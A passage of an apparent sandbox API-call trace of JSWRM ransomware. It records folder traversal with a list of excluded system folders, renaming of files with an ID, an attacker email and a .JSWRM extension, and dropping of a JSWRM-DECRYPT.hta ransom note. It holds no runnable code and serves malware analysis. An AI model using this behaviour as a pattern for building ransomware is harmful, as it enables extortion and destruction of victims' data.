0x247a88 [0068.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0068.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.918] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0068.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0068.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.918] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d8079e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d8079e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d8079e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1d51, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="Stars.jpg", cAlternateFileName="")) returned 0 [0068.918] FindClose (in: hFindFile=0x231b00 | out: hFindFile=0x231b00) returned 1 [0068.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0068.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0068.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.920] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b56882, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="TextConv", cAlternateFileName="")) returned 1 [0068.920] lstrcmpiW (lpString1="TextConv", lpString2=".") returned 1 [0068.920] lstrcmpiW (lpString1="TextConv", lpString2="..") returned 1 [0068.920] lstrcmpiW (lpString1="TextConv", lpString2="...") returned 1 [0068.920] lstrcmpiW (lpString1="TextConv", lpString2="windows") returned -1 [0068.920] lstrcmpiW (lpString1="TextConv", lpString2="recovery") returned 1 [0068.920] lstrcmpiW (lpString1="TextConv", lpString2="perflogs") returned 1 [0068.920] lstrcmpiW (lpString1="TextConv", lpString2="documents and settings") returned 1 [0068.920] lstrcmpiW (lpString1="TextConv", lpString2="$RECYCLE.BIN") returned 1 [0068.920] lstrcmpiW (lpString1="TextConv", lpString2="system volume information") returned 1 [0068.920] lstrcmpiW (lpString1="TextConv", lpString2="msocache") returned 1 [0068.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0068.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216d80 [0068.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0068.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0068.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0068.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.920] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\jswrm-decrypt.hta")) returned 0xffffffff [0068.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24c1d0 [0068.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24dfa0 [0068.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0068.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0068.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0068.922] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0068.923] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.923] WriteFile (in: hFile=0x298, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0068.924] CloseHandle (hObject=0x298) returned 1 [0068.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24dfa0 | out: hHeap=0x1e0000) returned 1 [0068.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0068.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0068.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0068.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0068.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0068.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0068.924] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\jswrm-decrypt.hta")) returned 0x20 [0068.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0068.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.925] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b56882, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fbd0dcb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName=".", cAlternateFileName="")) returned 0x231b40 [0068.925] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.925] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b56882, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fbd0dcb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="..", cAlternateFileName="")) returned 1 [0068.925] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.925] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.925] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b5787e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="en-US", cAlternateFileName="")) returned 1 [0068.925] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0068.925] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0068.925] lstrcmpiW (lpString1="en-US", lpString2="...") returned 1 [0068.925] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0068.925] lstrcmpiW (lpString1="en-US", lpString2="recovery") returned -1 [0068.925] lstrcmpiW (lpString1="en-US", lpString2="perflogs") returned -1 [0068.925] lstrcmpiW (lpString1="en-US", lpString2="documents and settings") returned 1 [0068.925] lstrcmpiW (lpString1="en-US", lpString2="$RECYCLE.BIN") returned 1 [0068.925] lstrcmpiW (lpString1="en-US", lpString2="system volume information") returned -1 [0068.925] lstrcmpiW (lpString1="en-US", lpString2="msocache") returned -1 [0068.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0068.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.925] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\en-us\\jswrm-decrypt.hta")) returned 0xffffffff [0068.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0068.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0068.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.926] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\en-us\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.926] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.926] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.928] CloseHandle (hObject=0x454) returned 1 [0068.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0068.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0068.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.929] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\en-us\\jswrm-decrypt.hta")) returned 0x20 [0068.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.929] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b5787e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fbf6ffd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2258f0, cFileName=".", cAlternateFileName="")) returned 0x232100 [0068.929] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.929] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b5787e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fbf6ffd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2258f0, cFileName="..", cAlternateFileName="")) returned 1 [0068.929] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.929] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.929] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fbf6ffd, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fbf6ffd, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fbf6ffd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x2258f0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.929] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.929] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.929] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.929] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.929] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.929] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.929] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.929] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.929] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.929] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0068.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0068.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0068.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.930] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fbf6ffd, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fbf6ffd, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fbf6ffd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x2258f0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0068.930] FindClose (in: hFindFile=0x232100 | out: hFindFile=0x232100) returned 1 [0068.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0068.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0068.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0068.930] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fbd0dcb, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fbd0dcb, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fbd0dcb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.930] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.930] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.930] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.930] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.930] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.930] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.930] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.930] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.930] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.930] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0068.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0068.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0068.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0068.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0068.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0068.931] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fbd0dcb, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fbd0dcb, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fbd0dcb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0068.931] FindClose (in: hFindFile=0x231b40 | out: hFindFile=0x231b40) returned 1 [0068.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0068.931] HeapFree (in: hHeap=0x1e0000, 